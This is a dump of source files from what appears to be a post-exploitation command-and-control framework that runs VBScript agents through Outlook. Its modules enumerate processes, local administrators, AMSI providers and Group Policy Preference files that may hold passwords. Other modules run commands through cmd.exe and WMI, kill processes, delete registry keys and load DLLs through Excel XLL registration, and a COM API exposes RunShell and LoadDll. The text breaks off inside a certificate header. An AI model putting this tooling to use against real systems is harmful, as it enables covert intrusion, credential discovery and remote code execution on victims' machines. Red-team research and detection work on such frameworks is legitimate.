-------------------------------------------------------------------------------- /functions/enumerate/host/list_basic.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates basic details about the host. It retrieves: 10 | - %Computername% 11 | - %Username% 12 | - %Userdomain% 13 | - %Userprofile% 14 | - %Userdnsdomain% 15 | - %Logonserver% 16 | - %Homepath% 17 | 18 | It uses Wscript.Shell 19 | - ExpandEnvironmentStrings 20 | """ 21 | self.entry = 'list_basic' 22 | self.depends = [] 23 | super().__init__(templatepath) 24 | 25 | def rethandler(self, agent, options, data): 26 | if ("-VSTO" not in agent.hostname): # Handle exception when VSTO agents are used 27 | agent.hostname = data.split()[3] 28 | agent.username = data.split()[1] 29 | 30 | -------------------------------------------------------------------------------- /functions/execute/host/cmd.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Execute a command via cmd.exe and print any output to the agent log file. 11 | Uses the cmd /c prefix 12 | 13 | It uses Wscript.shell 14 | - Run 15 | 16 | It uses Scripting.FileSystemObject 17 | - OpenTextFile 18 | - FileExists 19 | - GetSpecialFolder 20 | - GetTempname 21 | - DeleteFile 22 | 23 | """ 24 | self.entry = 'Execute_CMD' 25 | self.options['command'] = { 26 | "value": None, 27 | "required": True, 28 | "description": "Command to execute on remote target", 29 | "handler": quotedstring 30 | } 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocpid.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module terminates the process id you define using the pid option. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name,ProcessId,ParentProcessId from Win32_Process Where ProcessID = VARIABLE 14 | - Query.Terminate() 15 | """ 16 | self.entry = 'KillProc_PID' 17 | self.depends = [] 18 | self.options['pid'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "PID of the process you want to kill, all instances will be killed", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/api/verify_api.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Checks if the API is working or not. If this returns an error you should investigate the api installation. 10 | 1. Is the dll present on system? The dll paths pushed through the install_api module can be found under info/dbdata. 11 | 2. Is the necesarry registry keys present on the host? 12 | 3. Consider re-running the api_install 13 | 4. Could it be an EDR blocking you :INSERT SCREAMING GIF HERE: 14 | """ 15 | self.entry = 'api_verify' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | 19 | def rethandler(self, agent, options, data): 20 | if data == "False": 21 | agent.api_verified = False 22 | if data == "True": 23 | agent.api_verified = True -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedpowershell.txt: -------------------------------------------------------------------------------- 1 | Function list_installedpowershell() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | keyps3 = "SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" 7 | keyps1 = "SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" 8 | 9 | poshkey = "SOFTWARE\Microsoft\PowerShell" 10 | objReg.EnumKey 2147483650, keyps1, arrSubKeys 11 | objReg.GetStringValue 2147483650, keyps1, "PowerShellVersion", ver2 12 | 13 | objReg.EnumKey 2147483650, keyps3, arrSubKeys 14 | objReg.GetStringValue 2147483650, keyps3, "PowerShellVersion", ver3 15 | 16 | If IsNull(ver3) Then 17 | If IsNull(ver2) Then 18 | val = "nothing" 19 | Else 20 | val = ver2 21 | End If 22 | Else 23 | val = ver3 24 | End If 25 | 26 | list_installedpowershell = "PowerShell Version: " & val & vbCrlf & vbCrLf 27 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_networklogon.txt: -------------------------------------------------------------------------------- 1 | Function list_networklogon() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colNetLogProfs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkLoginProfile",,48) 6 | 7 | For Each NIC in colNetLogProfs 8 | For Each netlogAttribute in NIC.Properties_ 9 | if Not (IsNull(netlogAttribute.value) OR IsEmpty(netlogAttribute.value)) Then 10 | if IsArray(netlogAttribute) then 11 | netlogResponse = netlogResponse & netlogAttribute.Name & ": " & Join(netlogAttribute, ", ") & vbCrLf 12 | else 13 | netlogResponse = netlogResponse & netlogAttribute.Name & ": " & netlogAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_networklogon = netlogResponse 19 | End Function -------------------------------------------------------------------------------- /api/SpeculaApi/SpeculaApi.idl: -------------------------------------------------------------------------------- 1 | // SpeculaApi.idl : IDL source for SpeculaApi 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (SpeculaApi.tlb) and marshalling code. 6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(b0f5f947-8064-48f7-a623-5c058dc91cc8), 13 | dual, 14 | nonextensible, 15 | pointer_default(unique) 16 | ] 17 | interface ISepcula : IDispatch 18 | { 19 | [id(1)] HRESULT RunShell([in] BSTR cmd, [in, optional] VARIANT timeout, [out, retval] BSTR* result); 20 | [id(2)] HRESULT LoadDll([in] BSTR path, [in] boolean persist, [out, retval] boolean* status); 21 | }; 22 | [ 23 | uuid(5be8ef76-6253-482a-926e-d1d877de3b63), 24 | version(1.0), 25 | ] 26 | library SpeculaApiLib 27 | { 28 | importlib("stdole2.tlb"); 29 | [ 30 | uuid(e8b55279-c6b4-48f3-8138-b727337c0236) 31 | ] 32 | coclass Sepcula 33 | { 34 | [default] interface ISepcula; 35 | }; 36 | }; 37 | 38 | import "shobjidl.idl"; 39 | -------------------------------------------------------------------------------- /functions/operation/specula/remove_allowlongscriptruntime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | import uuid 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module removes the registry keys that allows long running scripts such as list_dir running recurse or service acl enumeration. 11 | 12 | The following value gets removed with this module: 13 | reg add "HKCU\Software\Microsoft\Internet Explorer\Styles" /v "MaxScriptStatements" /t REG_DWORD /d 0xFFFFFFFF /f 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).DeleteValue 18 | """ 19 | self.entry = 'RemoveAllowLongScriptRuntime' 20 | self.depends = ['./helperFunctions/Delregvalue_hkcu.txt'] 21 | 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_amsiproviders.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the AMSI Providers registered on the system. 10 | Based on MS documentation: 11 | https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371 12 | Gets the GUID and figures out the names from the Classes\\guid table in registry 13 | 14 | It uses WbemScripting.SWbemNamedValueSet 15 | - Add 16 | - Add.__ProviderArchitecture 17 | 18 | It uses WbemScripting.SWbemLocator 19 | - ConnectServer(root\cimv2) 20 | - ConnectServer(root\cimv2).EnumKey 21 | - ConnectServer(root\cimv2).GetStringValue 22 | """ 23 | self.entry = 'list_amsiproviders' 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/operation/file/list_shortcutinfo.txt: -------------------------------------------------------------------------------- 1 | Function list_shortcutinfo() 2 | On error resume next 3 | Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 4 | Set lnk = objShell.CreateShortcut({{file}}) 5 | list_shortcutinfo = "Fullname:" & lnk.fullname & vbCrLF 6 | list_shortcutinfo = list_shortcutinfo & "Arguments: " & lnk.arguments & vbCrLF 7 | list_shortcutinfo = list_shortcutinfo & "Description: " & lnk.description & vbCrLF 8 | list_shortcutinfo = list_shortcutinfo & "Hotkey: " & lnk.hotkey & vbCrLF 9 | list_shortcutinfo = list_shortcutinfo & "IconLocation: " & lnk.iconlocation & vbCrLF 10 | list_shortcutinfo = list_shortcutinfo & "RelativePath: " & lnk.relativepath & vbCrLF 11 | list_shortcutinfo = list_shortcutinfo & "TargetPath: " & lnk.TargetPath & vbCrLF 12 | list_shortcutinfo = list_shortcutinfo & "WindowStyle: " & lnk.windowstyle & vbCrLF 13 | list_shortcutinfo = list_shortcutinfo & "WorkingDirectory: " & lnk.workingdirectory & vbCrLF 14 | End Function -------------------------------------------------------------------------------- /functions/operation/network/nslookup.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = r""" 9 | This module attempts to recreate nslookup in vbscript. 10 | This will use the WMI class Win32_PingStatus to ping the host and get the IP address. 11 | Resolving the IP will fail if ping is not allowed. 12 | 13 | It uses: 14 | WbemScripting.SWbemLocator 15 | ConnectServer(".", "root\cimv2") 16 | SELECT * FROM Win32_PingStatus WHERE Address 17 | """ 18 | self.entry = 'nslookup' 19 | self.depends = [] 20 | self.options['hostname'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Hostname to resolve", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/operation/registry/delkeyhkcuregistry.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes registry key in the HKCU hive specified in the PathToKey option recursivly. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).DeleteKey 14 | 15 | DeleteKey 16 | """ 17 | self.entry = 'DelKey_HKCU_Registry' 18 | self.depends = ['./helperFunctions/Delregkey_hkcu.txt'] 19 | self.options['PathToKey'] = { 20 | "value": None, 21 | "required": True, 22 | "description": "Path to the key you would like to delete. Example: Software\\EvilCorp\\subkey", 23 | "handler": quotedstring 24 | } 25 | super().__init__(templatepath) 26 | -------------------------------------------------------------------------------- /helperFunctions/Getallregkeys.txt: -------------------------------------------------------------------------------- 1 | Function GetAllRegKeys(Root, Regpath, Arch, RootInt) 2 | On Error Resume Next 3 | GetAllRegKeys = "Failed to get values under " & Root & "\" & Regpath 4 | const REG_SZ = 1 5 | const REG_EXPAND_SZ = 2 6 | const REG_BINARY = 3 7 | const REG_DWORD = 4 8 | const REG_MULTI_SZ = 7 9 | const REG_QWORD = 11 10 | Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 11 | oCtx.Add "__ProviderArchitecture", Arch 12 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 13 | Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv") 14 | objreg.EnumKey RootInt, Regpath, arrKeys 15 | GetAllRegKeys = "Listing keys under " & Root & "\" & Regpath & vbCrLf 16 | For Each subkey in arrKeys 17 | GetAllRegKeys = GetAllRegKeys & Root & "\" & Regpath & "\" & subkey & vbCrLf 18 | Next 19 | 20 | GetAllRegKeys = GetAllRegKeys & "-----------------------------------------" & vbCrLf 21 | End Function 22 | -------------------------------------------------------------------------------- /helperFunctions/dir_creator.txt: -------------------------------------------------------------------------------- 1 | Function dir_creator(folderpath) 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | strDir = fs.GetAbsolutePathName(folderpath) 5 | arrDirs = Split( strDir, "\" ) 6 | If Left( strDir, 2 ) = "\\" Then 7 | strDirBuild = "\\" & arrDirs(2) & "\" & arrDirs(3) & "\" 8 | idxFirst = 4 9 | Else 10 | strDirBuild = arrDirs(0) & "\" 11 | idxFirst = 1 12 | End If 13 | 14 | For i = idxFirst to Ubound( arrDirs ) 15 | strDirBuild = fs.BuildPath( strDirBuild, arrDirs(i) ) 16 | If Not fs.FolderExists( strDirBuild ) Then 17 | fs.CreateFolder strDirBuild 18 | End if 19 | Next 20 | 21 | if fs.FolderExists(folderpath) then 22 | dir_creator = "Folder path: " & folderpath & " created successfully" 23 | else 24 | dir_creator = "Failed to create folder path: " & folderpath & " - Possibly permission issue" 25 | end if 26 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_iprouting.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the IP Routing table using the Win32_IP4RouteTable and the Win32_IP4PersistedRouteTable classes. 10 | (Only a few selected attributes is dumped) 11 | Official documentation: 12 | - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4routetable 13 | - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4persistedroutetable 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - Query: SELECT * FROM Win32_IP4RouteTable 18 | - Query: SELECT * FROM Win32_IP4PersistedRouteTable 19 | """ 20 | self.entry = 'list_iprouting' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/copy_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will copy a file. 10 | 11 | It uses Scripting.FileSystemObject 12 | - CopyFile 13 | - FileExists 14 | """ 15 | self.entry = 'copy_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path and filename of source file. i.e. c:\\foo.txt.", 21 | "handler": quotedstring 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Path and filename of destination file. i.e. c:\\bar.txt.", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_amsiproviders.txt: -------------------------------------------------------------------------------- 1 | Function list_amsiproviders() 2 | On error resume next 3 | const REG_SZ = 1 4 | const REG_EXPAND_SZ = 2 5 | const REG_BINARY = 3 6 | const REG_DWORD = 4 7 | const REG_MULTI_SZ = 7 8 | const REG_QWORD = 11 9 | 10 | myoutput = "Registered AMSI providers found on system:" & vbCrLf 11 | Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 12 | oCtx.Add "__ProviderArchitecture", 64 13 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 14 | Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv") 15 | objreg.EnumKey 2147483650, "Software\Microsoft\AMSI\Providers", arrKeys 16 | For Each subkey in arrKeys 17 | myoutput = myoutput & "Provider guid: " & subkey & vbCrLf 18 | objReg.GetStringValue 2147483650,"Software\Classes\CLSID\" & subkey,"",strValue 19 | myoutput = myoutput & "CLSID name: " & strValue & vbCrLf & vbCrLf 20 | Next 21 | list_amsiproviders = myoutput 22 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_localadmins.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the local administrators on the host specified with the inMachine option 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select * from Win32_ComputerSystem 14 | - Query: SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators' 15 | """ 16 | self.entry = 'list_localadmins' 17 | self.depends = [] 18 | self.options['host'] = { 19 | "value": ".", 20 | "required": True, 21 | "description": "The machine you want to list local admins from. It defaults to localhost using .", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_user.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the user specified in the samaccountName option. 11 | If user account is found it also enumerates the properties of the account. 12 | If account not found it will say so in the returned data 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(\\root\\directory\\LDAP) 16 | - Query: SELECT * FROM ds_user Where DS_sAMAccountName = VARIABLE 17 | """ 18 | self.entry = 'list_user' 19 | self.depends = [] 20 | self.options['samaccountname'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "samaccountname to retreive information for", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_notifications.txt: -------------------------------------------------------------------------------- 1 | Function list_notifications() 2 | On Error Resume Next 3 | version = left(window.external.OutlookApplication.Version,4) 4 | basepath = "software\microsoft\office\outlook\Settings\Data" 5 | basepath2 = "SOFTWARE\Microsoft\Office\" & version & "\Outlook\Preferences" 6 | 7 | 'Toast 8 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_NewmailToast", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 9 | 10 | 'Sound 11 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_PlaySound", 64, 2147483649, "STDREGPROV") & vbCrLf 12 | list_notifications = list_notifications & GetRegValue("HKCU", basepath2, "PlaySound", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 13 | 14 | 'envelope 15 | list_notifications = list_notifications & GetRegValue("HKCU", basepath, "global_Mail_ShowEnvelope", 64, 2147483649, "STDREGPROV") & vbCrLf 16 | list_notifications = list_notifications & GetRegValue("HKCU", basepath2, "ShowEnvelope", 64, 2147483649, "STDREGPROV") & vbCrLf & vbCrLf 17 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wmi_execute.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module executes the specified command in the command option using the objProcess.Create method in WMI. 11 | It also returns the process ID of the new process you created. 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - ConnectServer(root\cimv2).Get("Win32_ProcessStartup").SpawnInstance_() 16 | - ConnectServer(root\cimv2).Get("Win32_Process") 17 | """ 18 | self.entry = 'Execute_WMICommand' 19 | self.depends = [] 20 | self.options['command'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Command to execute via wmi Process Create", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/move_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will move a file. This can also be used to rename a file. 10 | 11 | It uses Scripting.FileSystemObject 12 | - MoveFile 13 | - FileExists 14 | """ 15 | self.entry = 'move_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path and filename of source file. i.e. c:\\foo.txt.", 21 | "handler": quotedstring 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "Path and filename of destination file. i.e. c:\\bar.txt.", 27 | "handler": quotedstring 28 | } 29 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/check_filehash.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module gets the MD5 hash of the file specified. 10 | 11 | It uses System.Security.Cryptography.MD5CryptoServiceProvider 12 | - ComputeHash_2 13 | - Hash 14 | 15 | It uses ADODB.Stream 16 | - Open 17 | - LoadFromFile 18 | - Position 19 | - Read 20 | - Close 21 | 22 | It uses MSXML2.DOMDocument 23 | - CreateElement 24 | """ 25 | self.entry = 'check_filehash' 26 | self.depends = [] 27 | self.options['file'] = { 28 | "value": None, 29 | "required": True, 30 | "description": "path to file you want to get MD5 hash for", 31 | "handler": quotedstring 32 | } 33 | super().__init__(templatepath) 34 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_gpp.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.depends = ['./helperFunctions/dir_lister.txt'] 9 | self.help = """ 10 | Lists Group Policy Preferences files local on host that could contain passwords, configurations or other data. 11 | It looks inside C:\\Windows\\System32\\GroupPolicy\\DataStore\\0\\sysvol\\domain.com\\Policies\\ on the local host for the following files 12 | Groups.xml 13 | Drives.xml 14 | Services.xml 15 | ScheduledTasks.xml 16 | Datasources.xml 17 | Printers.xml 18 | 19 | It uses Wscript.Shell 20 | - ExpandEnvironmentStrings 21 | 22 | It uses Scripting.FileSystemObject 23 | - FolderExists 24 | - GetFolder 25 | - GetFolder().Files 26 | - GetBaseName 27 | - GetExtensionName 28 | """ 29 | self.entry = 'list_gpp' 30 | self.depends = [] 31 | super().__init__(templatepath) 32 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_processes.txt: -------------------------------------------------------------------------------- 1 | Function list_processes() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 4 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process") 5 | procs = "PID" & vbTab & "PPID" & vbTab & "Arch" & vbTab & "ProcessName" & vbTab & vbTab & vbTab & "Executable Path" & vbCrLf 6 | For Each obj in col 7 | if obj.VirtualSize < 4000000000 Then 8 | procarch = "x86" 9 | if obj.processid = "0" then 10 | procarch = "x64" 11 | end if 12 | if obj.processid = "4" then 13 | procarch = "x64" 14 | end if 15 | else 16 | procarch = "x64" 17 | end if 18 | if obj.Name = "Memory Compression" Then 19 | procarch = "x64" 20 | end if 21 | if obj.Name = "Registry" Then 22 | procarch = "x64" 23 | end if 24 | procs = procs & obj.ProcessId & vbTab & obj.ParentProcessId & vbTab & procarch & vbTab & obj.Name & vbTab & vbTab & vbTab & obj.ExecutablePath & vbCrLf 25 | Next 26 | list_processes = procs 27 | End Function -------------------------------------------------------------------------------- /functions/operation/file/copy_dir.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will copy a directory including all subdirectories/files. 10 | Specify paths without trailing \\. 11 | 12 | It uses Scripting.FileSystemObject 13 | - CopyFolder 14 | - FolderExists 15 | """ 16 | self.entry = 'copy_dir' 17 | self.depends = [] 18 | self.options['directory'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Directory you want to copy. i.e. c:\\folder", 22 | "handler": quotedstring 23 | } 24 | self.options['destination'] = { 25 | "value": None, 26 | "required": True, 27 | "description": "Destination directory you want your copy. i.e. c:\\copyoffolder", 28 | "handler": quotedstring 29 | } 30 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/handlers/redirect_template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Search Plugin 6 | 30 | 32 | 33 | 34 | 35 |
36 |

searchplugin

37 | 38 | 39 |
40 | 41 | 42 | -------------------------------------------------------------------------------- /functions/execute/host/execute_registerxll.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module runs the registerxll function in excel, allowing you to execute a DLL(XLL). 10 | 11 | XLL file must be on disk, does not work over http. The XLL can be named whatever as extension. (or nothing at all) 12 | 13 | For tips on how to create a XLL you can go here: 14 | https://learn.microsoft.com/en-us/office/client-developer/excel/creating-xlls 15 | 16 | 17 | It uses the excel application 18 | - Registerxll 19 | """ 20 | self.entry = 'execute_registerxll' 21 | self.depends = [] 22 | self.options['input'] = { 23 | "value": None, 24 | "required": True, 25 | "description": "Path to xll file on disk", 26 | "handler": quotedstring 27 | } 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentcommands.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates recent executed commands from the registry 10 | HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add.__ProviderArchitecture 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumValues 18 | - ConnectServer(root\cimv2).GetStringValue 19 | - ConnectServer(root\cimv2).GetExpandedStringValue 20 | - ConnectServer(root\cimv2).GetBinaryValue 21 | - ConnectServer(root\cimv2).GetDWORDValue 22 | - ConnectServer(root\cimv2).GetMultiStringValue 23 | - ConnectServer(root\cimv2).GetQWORDValue 24 | """ 25 | self.entry = 'list_recentcommands' 26 | self.depends = ['./helperFunctions/Getallregvalues.txt'] 27 | super().__init__(templatepath) 28 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocname.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module terminates the process name you define using the process option. 10 | Be careful, since it will kill all processes with that name. 11 | Meaning if you define winword.exe it will kill all instances of winword.exe 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - Query: Select Name,ProcessId,ParentProcessId from Win32_Process Where Name = VARIABLE 16 | - Query.Terminate() 17 | 18 | """ 19 | self.entry = 'KillProc_Name' 20 | self.depends = [] 21 | self.options['process'] = { 22 | "value": None, 23 | "required": True, 24 | "description": "process name you want to kill, all instances will be killed", 25 | "handler": quotedstring 26 | } 27 | super().__init__(templatepath) 28 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_environmentvariables.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Lists interesting registry values that might be passwords 10 | or other interesting configuration settings 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).EnumValues 19 | - ConnectServer(root\cimv2).GetDwordValue 20 | - ConnectServer(root\cimv2).GetStringValue 21 | - ConnectServer(root\cimv2).GetExpandedStringValue 22 | - ConnectServer(root\cimv2).GetBinaryValue 23 | - ConnectServer(root\cimv2).GetMultiStringValue 24 | - ConnectServer(root\cimv2).GetQWORDValue 25 | """ 26 | self.entry = 'list_environmentvariables' 27 | self.depends = ['./helperFunctions/Getallregvalues.txt'] 28 | super().__init__(templatepath) 29 | -------------------------------------------------------------------------------- /ssl/ssl-cert-snakeoil.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | 